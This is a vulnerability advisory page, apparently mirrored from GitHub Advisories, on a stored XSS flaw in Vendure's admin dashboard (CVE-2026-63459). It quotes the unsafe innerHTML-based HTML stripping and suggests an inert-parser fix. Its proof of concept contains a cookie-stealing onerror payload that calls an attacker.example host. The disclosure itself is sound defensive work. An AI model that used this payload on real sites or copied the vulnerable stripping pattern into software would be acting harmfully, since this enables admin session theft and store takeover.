OFFLINE
Awaiting data
Security intelligence
MajorCritical vulnerability

CVE-2026-63459: Vendure has stored XSS in the Admin Dashboard via unsafe HTML-stripping (innerHTML) of entity descriptions

GitHub Advisories · officialPublished Sep 17, 2026Risk 37/100

# Stored XSS in the Admin Dashboard via unsafe HTML-stripping (`innerHTML`) of entity descriptions **Package:** @vendure/dashboard (vendure-ecommerce/vendure, latest master) · ## Summary The dashboard's `RichTextDescriptionCell` "strips HTML" from an entity's `description` by assigning it to a live element's `innerHTML` and reading back `textContent`. This pattern still **executes** active markup: a `description` containing `<img src=x onerror=…>` runs script when the element is parsed (image resource loads even on a detached node in Chromium/Firefox, firing `onerror`). Because `description` is an admin-settable field shown in multiple list views, a lower-privilege administrator can store a payload that executes in a **higher-privilege administrator's** browser when they open the corresponding list — stored XSS leading to admin-session compromise. ## Vulnerable code `packages/dashboard/src/lib/components/shared/table-cell/order-table-cell-components.tsx` ```tsx export const RichTextDescriptionCell: DataTableCellComponent<{ description: string }> = ({ cell }) => { const value = cell.getValue(); const textContent = useMemo(() => { if (!value) return ''; const div = document.createElement('div'); div.innerHTML = value; // line 51 — parses/loads active markup; <img onerror> fires here return div.textContent ?? ''; // line 52 — reading textContent does NOT undo the side effect }, [value]); ... } ``` `innerHTML` does not run `<script>`, but it **does** trigger resource loads / event handlers such as `<img src=x onerror=...>`, `<image>`, `<svg>` handlers — even on a detached element — so the assignment itself is the sink. Reading `textContent` afterwards is irrelevant; the handler has already executed. ## Reachable from (all use this cell for the `description` column) - `_products/products.tsx:53`, `_collections/collections.tsx`, `_promotions/promotions.tsx:62`, `_payment-methods/payment-methods.tsx:57`, `_shipping-methods/shipping-methods.tsx:39`. All of these are `description` fields editable by administrators with the corresponding catalog/promotion/settings write permissions — which, in Vendure's multi-channel model, includes **channel-scoped admins**. ## Proof of concept 1. As an administrator with `UpdateCatalog`/`UpdateProduct` (e.g. a channel-scoped admin), set a Product's `description` to: `<img src=x onerror="fetch('https://attacker.example/'+encodeURIComponent(document.cookie))">` 2. Any administrator who opens the **Products** list in the dashboard renders `RichTextDescriptionCell` for that row → `div.innerHTML = description` → the `onerror` executes in their session. 3. Payload runs with the viewing admin's privileges (e.g. a superadmin) → session/token exfiltration or admin actions → **cross-privilege / cross-channel admin takeover** (chains directly with the channel-scoping IDOR class already reported). ## Impact Stored XSS executing in administrators' browsers, escalating a low-privilege (e.g. single-channel) admin to actions as any admin who views the affected list. Account/store takeover. ## Suggested fix Strip HTML with an **inert** parser (no script/resource execution) instead of a live element, or sanitize before display: ```ts // inert: DOMParser documents do not execute scripts or load resources const textContent = new DOMParser().parseFromString(value ?? '', 'text/html').body.textContent ?? ''; ``` (Or render with a vetted sanitizer such as DOMPurify if rich text must be shown.) Audit the codebase for other `element.innerHTML = <untrusted>` assignments used for "stripping".

Upgrade affected packages to a patched version: @vendure/dashboard 3.6.5.

Vendor
Not specified
Product
@vendure/dashboard
Exploitation
none known
Evidence
official
CVSS
8.7

This record is attributed to GitHub Advisories. Exploitation status and remediation guidance are kept separate from the vulnerability's technical severity.

Open primary source